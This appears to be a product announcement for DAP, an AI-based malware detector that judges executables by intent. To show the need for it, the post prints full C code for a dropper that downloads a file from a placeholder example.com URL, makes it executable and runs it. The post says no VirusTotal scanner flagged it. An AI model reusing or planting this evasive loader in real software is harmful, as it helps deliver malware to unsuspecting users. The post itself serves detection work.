Introducing Deep Application Profiling

One-Shot Zero-Day AI-Powered malware detection.

We have developed a new approach to malware analysis and detection that addresses the limitations of traditional methods and offers a pathway towards zero day malware detection. To understand the significance of this shift, let's look at the industry's current state. Traditional signature-based techniques rely on matching executable(s) to known malware or detecting patterns from past behavior. Machine learning has enhanced detection by learning from previous cases. However, these methods are increasingly bypassed by attackers using custom, unseen code which birth new malware variants. Detecting zero-day malware remains a major challenge.

How DAP works

“Intention is all you need”

Our approach focuses on identifying zero-day threats by analyzing their intent using Neural Networks. We’re moving away from the traditional approach of relying on past malware appearances and historical patterns, shifting our focus to understanding the intent behind executable files. Instead of relying on known signatures or machine learning models trained on past data, we focus on understanding the core purpose of the executable and to determine if it poses a malicious risk. We strongly believe that this is the pathway towards Zero day malware discovery.

Effectiveness of DAP Against Zero-Day Malware

To evaluate DAP's performance in detecting Zero-Day malware, we conducted a comprehensive experiment comparing it against 66 existing malware solutions. We developed a simple executable designed to mimic suspicious behavior: it downloads another executable from the internet and executes it. This sequence of actions is atypical for legitimate applications and should be reliably flagged as malicious or at least suspicious by security solutions. The intent was to create a realistic Zero-Day threat that had not been previously identified or cataloged.

A snippet of the code can be seen below:

#include <stdio.h>
#include <stdlib.h>
#include <curl/curl.h>
#include <sys/stat.h>
#include <unistd.h>

void download_and_execute(const char* url, const char* filename) {
    CURL *curl;
    FILE *fp;
    CURLcode res;

    curl = curl_easy_init();
    if(curl) {
        fp = fopen(filename, "wb");
        if(fp) {
            curl_easy_setopt(curl, CURLOPT_URL, url);
            curl_easy_setopt(curl, CURLOPT_WRITEDATA, fp);
            res = curl_easy_perform(curl);
            if(res == CURLE_OK) {
                printf("File downloaded successfully: %s\n", filename);
                fclose(fp);
                curl_easy_cleanup(curl);
                if (chmod(filename, 0755) == 0) {
                    execve(filename, (char *const[]){filename, NULL}, NULL);
                } else {
                    perror("chmod");
                }
            } else {
                fprintf(stderr, "curl_easy_perform() failed: %s\n", curl_easy_strerror(res));
                fclose(fp);
            }
        } else {
            perror("fopen");
            curl_easy_cleanup(curl);
        }
    }
}

int main() {
    const char* url = "https://example.com/malicious_script.sh";
    const char* filename = "/tmp/downloaded_file";
    download_and_execute(url, filename);
    return 0;
}

We compiled the aforementioned code into an executable file and submitted it to VirusTotal, where none of the 66 scanners flagged it as malicious. Despite its clearly suspicious behavior which it exhibits by downloading and executing an executable. The code evaded detection simply because it was custom written and because it doesn't match the typical patterns that antivirus tools search for.

Virus Total Scan Results

In contrast, our Deep Application Profiler, without any prior exposure to the executable or the code, effectively analyzed the executable, detected the threat, and provides evidence to back up the risk score in the form of pseudocode, as demonstrated in the video below.

Who DAP Is For?

DAP will be available in two offerings to cater to different user needs: a web service and an API.

Web Service: Designed for professional malware analysts, the web service offers an intuitive platform to analyze executable files. Analysts can leverage DAP’s advanced tools to dissect and understand malware behavior efficiently, enhancing their ability to identify and mitigate threats.

API: Tailored for organizations such as antivirus companies, government agencies, and other enterprises, the API allows seamless integration of DAP’s technology into existing systems. By incorporating our API, these organizations can enhance their malware detection capabilities, providing more robust and proactive security measures.

Whether you are an individual analyst seeking powerful analysis tools or an organization aiming to bolster your cyber-security infrastructure, DAP provides the solutions you need to stay ahead of evolving threats.

Limitations

One limitation we are currently facing is processing time. Due to the rigorous analysis involved, certain types of executable files may take up several minutes to process. We are actively optimizing our processes to reduce these times without compromising detection accuracy, ensuring faster and more efficient malware analysis.

DAP has now been deemed awardable in the DARPA ERIS Market Place. Government customers, please check out our 7-minute video solution on ERIS: www.darpaconnect.us/eris.